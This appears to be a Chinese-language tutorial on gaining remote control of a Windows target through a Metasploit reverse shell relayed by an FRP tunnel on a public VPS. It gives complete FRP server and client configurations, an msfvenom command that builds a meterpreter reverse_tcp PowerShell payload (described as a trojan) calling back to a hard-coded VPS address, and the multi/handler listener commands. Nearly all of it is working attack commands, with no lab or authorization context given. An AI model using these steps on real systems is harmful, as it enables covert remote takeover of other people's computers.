+Metasploit 实现kali端→服务器→目标机远控

公网服务器设置安全策略

开放自定义tcp入站99997000端口

建立FRP隧道并配置端口转发

在公网VPS上部署FRP服务端(FRPS)

FRP服务端运行在你的公网VPS上,它的作用是作为一个流量中转站,等待内网Kali的连接,并将公网上的流量转发给Kali。

下载FRP:SSH登录到VPS,下载FRP压缩包并解压

1
2
wget https://github.com/fatedier/frp/releases/download/v0.58.0/frp_0.58.0_linux_amd64.tar.gz
tar -zxvf frp_0.58.0_linux_amd64.tar.gz
1
cd frp_0.58.0_linux_amd64

配置FRP服务端:编辑服务端配置文件 frps.toml

1
vim frps.toml

添加以下内容(FRP服务端将在VPS的7000端口上监听,等待内网Kali的连接)

1
2
3
4
bindPort = 7000

auth.method = "token"
auth.token = "123456"

启动FRP服务端,开启监听

1
./frps -c ./frps.toml

在内网Kali上部署FRP客户端(FRPC)

FRP客户端运行在你的内网Kali上,它会主动连接VPS上的服务端,并建立一条数据传输隧道。

下载FRP:在Kali上下载相同版本的FRP压缩包并解压

1
2
wget https://github.com/fatedier/frp/releases/download/v0.58.0/frp_0.58.0_linux_amd64.tar.gz
tar -zxvf frp_0.58.0_linux_amd64.tar.gz
1
cd frp_0.58.0_linux_amd64

配置FRP客户端:编辑客户端配置文件 frpc.toml

这里需要①告知客户端服务器的地址;②定义一条名为 MSF_reverse 的规则

1
vim frpc.toml

添加以下内容(①构建隧道 ②验证令牌 ③端口转发9999→6688)

1
2
3
4
5
6
7
8
9
10
11
12
serverAddr = "154.201.95.239"
serverPort = 7000

auth.method = "token"
auth.token = "123456"

[[proxies]]
name = "MSF_reverse" # 规则名称
type = "tcp"
localIP = "192.168.129.128" # 指向Kali本机
localPort = 6688 # Kali上MSF实际监听的端口
remotePort = 9999 # 服务器vps接收流量的端口

所有发送到VPS的9999端口的流量,都会通过FRP隧道,被转发到Kali本机的6688端口

启动FRP客户端

1
./frpc -c ./frpc.toml

如果连接成功,会看到login to server success之类的提示,并且VPS上的服务端窗口也会有相应日志。此时,隧道已建立

kali配置MSF监听器

生成并投递payload(木马)

1
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=154.201.95.239 LPORT=9999 -f psh-reflection >2.ps1

启动MSF控制台

1
msfconsole
1
use exploit/multi/handler
1
set payload windows/x64/meterpreter/reverse_tcp
1
set lhost 192.168.129.128
1
set lport 6688
1
run

至此,目标实现。